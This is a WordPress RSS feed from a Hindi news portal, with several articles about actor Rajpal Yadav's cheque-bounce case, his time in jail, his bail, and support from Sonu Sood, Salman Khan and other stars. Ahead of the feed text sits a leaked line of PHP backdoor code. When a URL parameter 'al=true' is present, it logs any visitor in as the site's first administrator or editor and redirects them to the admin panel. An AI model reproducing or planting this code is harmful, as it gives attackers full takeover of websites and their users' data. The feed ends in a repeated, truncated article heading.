// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Rajpal Yadav – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 31 Mar 2026 17:05:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 राजपाल यादव का भावुक बयान, पाई-पाई का रख रहा हूं हिसाब, चुकाऊंगा हर चाहने वाले का कर्ज https://pratyushaashakinayikiran.com/?p=209352 Tue, 31 Mar 2026 17:05:00 +0000 https://pratyushaashakinayikiran.com/?p=209352 बॉलीवुड अभिनेता राजपाल यादव इन दिनों अपने कानूनी मामलों को लेकर चर्चा में हैं. 9 करोड़ रुपये के चेक बाउंस केस में फंसे अभिनेता को हाल ही में बेल मिली है. इस मुश्किल समय में फिल्म इंडस्ट्री और फैंस से मिली आर्थिक मदद को लेकर अब उन्होंने खुलकर आभार जताया है.

‘आशीर्वाद की बारिश’ जैसा लगा साथ
कर्ली टेल्स के साथ एक इंटरव्यू के दौरान राजपाल यादव ने कहा कि उन्हें देश-विदेश से जिस तरह का प्यार और सहयोग मिला, वह उनके लिए बेहद भावुक करने वाला अनुभव था. उन्होंने इसे “आशीर्वाद की बारिश” जैसा बताया. उनके मुताबिक, हर वर्ग के लोगों- बच्चों, बुजुर्गों और फैंस ने उन्हें इस कठिन दौर में संभाला.

‘जिंदगी भर चुकाऊंगा यह कर्ज’
अभिनेता ने कहा कि यह सिर्फ आर्थिक मदद नहीं, बल्कि भरोसे और प्यार का प्रतीक है. उन्होंने भावुक होते हुए कहा कि वह अपनी पूरी जिंदगी इस एहसान को चुकाने की कोशिश करेंगे. उन्होंने अपने खास अंदाज में कहा कि कभी मनोरंजन के जरिए, तो कभी अपने काम से वह लोगों का प्यार लौटाने का प्रयास करेंगे.

हर मदद का रखा जा रहा हिसाब
राजपाल यादव ने यह भी बताया कि उन्होंने अपनी टीम को निर्देश दिया है कि हर छोटी-बड़ी मदद का रिकॉर्ड तैयार किया जाए. चाहे किसी ने एक रुपये दिए हों या बड़ी रकम, सभी का हिसाब रखा जा रहा है ताकि भविष्य में सम्मानपूर्वक उसे लौटाया जा सके.

इंडस्ट्री के सितारों ने बढ़ाया हाथ
इस दौरान कई सेलेब्स ने भी उनका साथ दिया. सोनू सूद सहित फिल्म इंडस्ट्री के कई कलाकारों ने उनकी मदद की. हालांकि, राजपाल यादव ने सभी नाम सार्वजनिक करने से परहेज किया, ताकि मदद करने वालों की निजता बनी रहे.

कुल मिलाकर, यह मुश्किल दौर राजपाल यादव के लिए एक सीख भी बनकर सामने आया है, जहां उन्हें लोगों के सच्चे साथ और प्यार का एहसास हुआ.

]]>
राजपाल यादव के तल्ख बयान ‘मांगने की जरूरत नहीं’ पर सोनू सूद की दो टूक प्रतिक्रिया https://pratyushaashakinayikiran.com/?p=202142 Tue, 03 Mar 2026 11:36:00 +0000 https://pratyushaashakinayikiran.com/?p=202142 मुंबई

राजपाल यादव धोखा-धड़ी केस में जेल में थे तो उन्हें बचाने के लिए इंडस्ट्री से कई हाथ आगे बढ़े। मुहिम की शुरुआत सोनू सूद ने की थी। उन्होंने एक पोस्ट में लिखा था कि राजपाल यादव को सम्मान के साथ मदद दें, उन्हें काम दें। जेल से अंतरिम जमानत पर बाहर आए राजपाल यादव को जब पता चला तो उन्होंने तल्ख लहजे में जवाब दिया कि लोगों को इस गलतफहमी में नहीं रहना चाहिए कि उन्हें काम की जरूरत है। अब राजपाल के जवाब पर सोनू सूद का रिएक्शन सामने आया है।

राजपाल के जवाब पर क्या बोले सोनू
सोनू सूद ने राजपाल यादव के कमेंट के बारे में कहा, 'उनके लिए खुश हूं। मैंने यह नहीं कहा था कि उन्हें काम की जरूरत है। मैंने कहा था कि उन्हें साइन कीजिए और एडवांस पैसे दीजिए क्योंकि वह इस योग्य हैं।'

सोनू सूद ने किया था ट्वीट
बता दें कि जब राजपाल यादव ने जब तिहाड़ जेल में सरंडर किया तो उनका इमोशनल बयान चर्चा में था। उन्होंने कहा था कि उनके पास पैसे नहीं हैं। यहां कोई किसी का नहीं। इसके बाद सोनू सूद ने एक ट्वीट किया। इसमें लिखा था कि राजपाल यादव के लिए वह जो बन पड़ेगा करेंगे। सोनू ने यह भी लिखा था कि उन्हें फिल्म के लिए साइन करें और एडवांस पैसे दें। सोनू के ट्वीट से इंस्पायर होकर कई लोग राजपाल की मदद करने आगे आए थे। टीवी एक्टर गुरमीत चौधरी ने भी राजपाल की मदद की थी और उन्हें भी सोनू सूद से प्रेरणा मिली थी।

राजपाल ने दिया था ये जवाब
राजपाल यादव जब जेल से बाहर आए और सोनू के कमेंट के बारे में पता चला तो बोले, 'प्लीज गलतफहमी से बाहर आ जाइए कि मुझे काम मांगने की जरूरत है। हां काम मांगने में कोई शर्म की बात नहीं। मैं अपने काम की वजह से ही जिंदा हूं, सिनेमा मेरा पैशन है और मैं ऐसे काम करता हूं कि चार गुना ज्यादा काम मिलता है। मैं छुट्टियों में भी काम करता हूं। मुझे काम नहीं मिलता बल्कि यह 11 साल से मेरे साथ रहा है।'

]]>
राजपाल यादव की गुरुवार को रिहाई तय? सलमान खान और अजय देवगन बने मददगार, मैनेजर ने दी पुष्टि https://pratyushaashakinayikiran.com/?p=197125 Wed, 11 Feb 2026 14:55:00 +0000 https://pratyushaashakinayikiran.com/?p=197125 मुंबई

राजपाल याद इस वक्त 5 करोड़ रुपये को लेकर चेक बाउंस केस में तिहाड़ जेल की सलाखों के पीछे हैं। साल 2010 का ये मामला धीरे-धीरे ऐसा नासूर बना कि अब उन्होंने घुटने टेक दिए। तिहाड़ जेल में सरेंडर करने से पहले राजपाल यादव ने सीधे और साफ शब्दों में कहा था कि उनके पास पैसे नहीं है इसलिए कोई और उपाय नहीं है। वहीं उन्होंने ये भी कहा था कि फिल्म इंडस्ट्री में ऐसा कोई नहीं जो उनकी मदद कर सके। अब घटना ने जहां फैन्स को दुखी किया वहीं बॉलीवुड सितारे भी उनकी मदद के लिए सामने आ रहे हैं। सबसे पहले सोनू सूद ने उनकी मदद के लिए आवाज उठाई और अब सलमान खान से लेकर अजय देवगन तक जैसे एक्टर्स ने उनकी मदद के लिए हाथ बढ़ा दिया है।

राजपाल यादव के मैनेजर ने बताया 9 करोड़ रुपये कर्ज और उसके निपटारे और जमानत पर बातें कीं। राजपाल यादव अपनी कुछ गलतियों की वजह से पर्सनल और प्रफेशनल लाइफ में जिस बुरे दौर से गुजर रहे हैं, अब उनकी मदद के लिए इंडस्ट्री ने हाथ बढ़ा दिया है। एक्टर के मैनेजर गोल्डी ने इस खास बातचीत में बताया कि उन्हें मदद करने वालों में अजय देवगन, सलमान खान, वरुण धवन और कई अन्य सितारे शामिल हैं।

गोल्डी बोले- बहुत से लोगों ने राजपाल यादव की मदद के लिए हाथ बढ़ाया
गोल्डी ने सलमान और अजय देनगन से मिले सपोर्ट पर बातें करते हुए कहा, 'बहुत से लोगों ने राजपाल यादव की मदद के लिए हाथ बढ़ाया है। सोनू सूद, सलमान खान और अजय देवगन जैसे एक्टर्स ने उन्हें सपोर्ट दिया है। मेरी अभी डेविड धवन से बात हुई थी, उन्होंने भी सम्पर्क किया है। रतन नैन, वरुण धवन… इस बार कई लोग उनकी मदद के लिए आगे आ रहे हैं, जिसकी राजपाल ने दिल से सराहना की है।'

राजपाल यादव के मैनेजर बोले- कल तक हो सकते हैं रिहा
उन्होंने कहा, 'अच्छी बात ये है कि उनकी स्थिति बिगड़ने के बाद इंडस्ट्री ने चट्टान की तरह उनका साथ दिया है और इसकी सराहना की जानी चाहिए।' उन्होंने बताया कि घर में सभी चाह रहे हैं कि राजपाल तब तक रिहा हो जाएं। उन्होंने उम्मीद जताई कि वो कल तक रिहा हो जाएंगे।

]]>
राजपाल यादव की गुरुवार को रिहाई तय? सलमान खान और अजय देवगन बने मददगार, मैनेजर ने दी पुष्टि https://pratyushaashakinayikiran.com/?p=197126 Wed, 11 Feb 2026 14:55:00 +0000 https://pratyushaashakinayikiran.com/?p=197126 मुंबई